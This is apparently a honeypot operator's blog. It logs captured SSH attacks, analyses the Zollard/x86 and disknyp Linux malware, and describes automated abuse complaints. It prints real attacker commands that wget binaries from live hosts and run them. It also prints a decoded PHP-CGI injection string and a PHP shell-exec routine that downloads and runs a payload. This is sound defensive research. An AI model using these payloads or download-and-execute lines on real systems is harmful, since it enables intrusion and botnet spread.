Posts Tagged ‘Honeypots’

Honeypot detection

Wednesday, April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en "\x31\x33\x33\x37"
cat /bin/ls

Now neither kippo nor cowrie, as sshd honeypots, has a file "/bin/ls" whose contents could be looked at, so a 'cat /bin/ls' just results in:

'cat: /bin/ls: No such file or directory'

So this seems to be an easy and reliable way to test for a standard sshd honeypot.
No wonder: \x31\x33\x33\x37 just translates to "1337", which I interpret as a smiley left by the hacker..
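An added example (not from the post): a small Python check a honeypot operator can run over a recorded kippo/cowrie command log to flag probes like the two above, and to expand the hex escapes the way echo -e would. The session lines are constructed.

```python
import re

# Constructed session lines in the style of a kippo/cowrie command log (not a real capture).
SAMPLE_SESSION = """\
echo -en "\\x31\\x33\\x33\\x37"
cat /bin/ls
uname -a
w
"""

# Commands whose purpose is to tell a real shell from a honeypot shell: reading the bytes
# of a system binary (the post notes kippo and cowrie have no contents behind /bin/ls, so
# 'cat' fails) and echo -e with hex escapes, whose output shows whether escapes expand.
PROBE_PATTERNS = [
    (re.compile(r"^cat\s+/(bin|sbin|usr/bin)/\S+"), "reads a system binary"),
    (re.compile(r"^echo\s+-[a-zA-Z]*e[a-zA-Z]*\s+.*\\x[0-9a-fA-F]{2}"), "echo with hex escapes"),
]

def decode_echo_hex(text):
    """Expand \\xHH escapes the way 'echo -e' does (hex form only, enough for this probe)."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)

def flag_probes(session_text):
    """Return (command, reason, decoded) per probe-like command; decoded is None without escapes."""
    hits = []
    for line in session_text.splitlines():
        cmd = line.strip()
        for pattern, reason in PROBE_PATTERNS:
            if pattern.search(cmd):
                decoded = decode_echo_hex(cmd) if "\\x" in cmd else None
                hits.append((cmd, reason, decoded))
                break
    return hits

if __name__ == "__main__":
    for cmd, reason, decoded in flag_probes(SAMPLE_SESSION):
        print(f"{cmd!r}: {reason}" + (f" -> {decoded!r}" if decoded else ""))
```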

MinCoin

Friday, January 10th, 2014

I am not up to date..

Looking at http://p2pool.org/ I see not only BitCoin storage, but also FeatherCoin, LiteCoin, MemeCoin, Terra, FreiCoin, LottoCoin and other stuff..

Whew.. I did not think that there are so many crypto currencies out there.

I found this because my honeypot captured a link to

http://110.154.103.80:58455/x86 (MD5 e66eb75f05328783c23745ef9d573de1)

(I mentioned this program (x86) earlier, but with a different MD5 hash..)

Looking at the “x86” program one can find the installation of a miner for “MinCoins”, storing them at p2pool.org.

I am wondering why not even one of the VirusTotal engines thinks that this is malware..

disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:

Patterns and Patter: An Investigation into SSH Activity Using Kippo Honeypots
Craig Valli, Priya Rabadia and Andrew Woodward
Edith Cowan University, Security Research Institute
Perth, Australia
c.valli@ecu.edu.au, prabadia@our.ecu.edu.au, a.woodward@ecu.edu.a

(to be found at http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1126&context=adf ) the download URL is already mentioned. clean-mx also knows the file host, and http://honey1.christiaan008.tk:8080/kippo-graph/kippo-input.php gives a good look at these activities as well.

disknyp 2

Monday, December 16th, 2013

Meanwhile I have captured 268 samples of disknyp.

It can be found at: http://198.2.192.204:22/disknyp

Cool.. a webserver on the ssh port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from:

http://ha-hfs.googlecode.com/files/hfs2.3 beta271.exe

Also available for download on this webserver is a svch.exe, probably infected, for Windows machines.

VirusTotal says only 24 of 48 antivirus vendors detect this trojan.

MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b

disknyp

Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
--2013-12-01 03:58:03--  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22... connected.
HTTP request sent, awaiting response... 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887 bytes ELF 32-bit LSB executable. I don't know yet what it is doing..

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log lines I found a wget line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

So I took a look at this binary, which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next look: try "strings". First nothing new.. but then I saw:

/proc/self/exe
POST
?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%
73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%
75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%
72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%
65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%
5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%
74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
<?php
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);

What the heck..? And who is "zollard"?

#### Update ####

The POST Part resolves to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

###############

Further on:

function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");

Now the binary loads another binary, executes it and starts a webserver?

myshellexec("wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd

A few lines more: it installs "iptables", drops every telnet connection and starts its own telnet daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd

In the end the program destroys its sources (rm -rf) and runs in:

mkdir -p
/var/run/.zollard/

The last lines:

chmod +x
cp /bin/sh
1234
12345
dreambox
smcadmin
stemroot
0!0
SHA1

So it ends up with some kind of crypto..

VirusTotal shows a hit rate of 2 out of 47; well, it is no Windows binary..

Has anyone seen this before? Who is zollard? Where did the binary get the necessary root credentials from? I guess I have to take a further look..

#### Update ####

There were quite a lot of download-trials today:

# grep gpharma nepenthes.log | wc -l
33348

which come from log lines like these:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

#### Update 2 ####

I executed the binary on a Linux VMware machine after adding "o+x" rights to it.

The iptables lines generate errors:

error inserting … ip_tables.ko – Unknown symbol in module

Immediately the machine starts exchanging traffic with 117.201.16.108:58455 and also starts listening on this port 58455.

Looks like my machine started scanning the IP range 117.201.16.* on that port; I receive answers from there... No httpd or telnetd daemons are listening according to "ps", which I had expected to see.

The command "pstree" shows a httpd, though! Different children are running, the last one has a connection to 117.201.18.22..23..24.. Looks like the "ps" executable has been changed.

Will see what else can be found. Now it is "St. Martin" time..:-)

good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

http://websiteanalystsresource.wordpress.com/

Seems like a good source for information.

Tor exit node used for attack

Wednesday, March 21st, 2012

One recent reply to a kippo-attack complaint explained that the attacking IP is a Tor exit node.

Of course there is no way for us to find the real attacker when he/she is using Tor for making this attack. Sad that this important service is abused in this way.

The system you have identified (cs-tor.bu.edu / 204.8.156.142) is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.

sshd complaints – update

Wednesday, March 14th, 2012

The automatic complaint mechanism is now active. An X-ARF complaint is generated
for each session in which a successful login into the kippo honeypot produced some
recorded commands. The email address the complaint is sent to is determined
as always: check our own database, check the RIPE website and check abusix.
Here is an example of the second MIME part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"


Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1

and the third MIME-part looks like this:


MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
--===============0648269240==--
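An added example (not the blog's own reporting code): assembling the three-part X-ARF complaint in Python with the standard library's email package, with the report.yaml fields laid out as in the second MIME part above. The reporting address, the User-Agent name and the session commands are placeholders.

```python
import uuid
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Placeholders: the reporting address and the reporting tool's User-Agent are made up.
REPORTED_FROM = "abuse-reports@example.org"
REPORTER_AGENT = "honeypot-reporter 0.1"
SCHEMA_URL = "http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json"

def build_report_yaml(source_ip, session_date, report_id=None):
    """Return the X-ARF report.yaml body for one successful login, with the fields from the post."""
    report_id = report_id or uuid.uuid4().hex + "@" + REPORTED_FROM.split("@", 1)[1]
    fields = [
        ("Reported-From", REPORTED_FROM), ("Category", "abuse"),
        ("Report-Type", "login-attack"), ("Destination-System", "kippo - sshd honeypot"),
        ("User-Agent", REPORTER_AGENT), ("Report-ID", report_id), ("Date", session_date),
        ("Service", "sshd"), ("Port", "22"), ("Source", source_ip), ("Source-Type", "ipv4"),
        ("Attachment", "text/plain"), ("Schema-URL", SCHEMA_URL), ("Version", "1.0.1"),
    ]
    return "".join(f"{key}: {value}\n" for key, value in fields)

def build_complaint(source_ip, session_date, commands, to_addr):
    """Assemble the three-part X-ARF mail: readable summary, report.yaml, command.txt."""
    msg = MIMEMultipart("mixed")
    msg["From"] = REPORTED_FROM
    msg["To"] = to_addr
    msg["Subject"] = f"Abuse report: successful SSH login from {source_ip}"
    # Part 1: human-readable text for whoever reads the abuse mailbox.
    msg.attach(MIMEText(f"On {session_date} a login from {source_ip} to our SSH honeypot "
                        "succeeded; the commands it ran are attached.\n", "plain", "utf-8"))
    # Part 2: the machine-readable X-ARF report, named report.yaml as in the post.
    report = MIMEText(build_report_yaml(source_ip, session_date), "plain", "utf-8")
    report.set_param("name", "report.yaml")
    msg.attach(report)
    # Part 3: the recorded commands, in place of the bulkier ttylog.
    cmds = MIMEText("recorded commands during this session:\n\n" + "\n".join(commands) + "\n",
                    "plain", "utf-8")
    cmds.set_param("name", "command.txt")
    msg.attach(cmds)
    return msg

# Constructed session; the download URL is a placeholder, not one seen on the honeypot.
SAMPLE_COMMANDS = ["w", "uname -a", "wget http://example.invalid/udp.tgz",
                   "tar zxvf udp.tgz", "rm -rf udp.tgz", "chmod +x *"]

if __name__ == "__main__":
    print(build_complaint("203.0.113.9", "2012-03-14 03:45:28", SAMPLE_COMMANDS,
                          "abuse@example.net").as_string())
```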

sshd-complaints

Friday, March 9th, 2012

I am pretty close to starting to send out complaints for successful sshd logins on my kippo honeypot. The X-ARF part is ready. I decided to add the recorded commands in the 3rd MIME part. The ttylog could also be useful, but the receiver of the complaint is probably not so interested in starting the playlog utility for each complaint. I still need to implement a database check so that receivers only get a handful of complaints and are not overwhelmed by their number.. Additionally the caught IPs will be added to our blacklist, just like for the attacks caught by nepenthes. Dionaea attacks will come next 🙂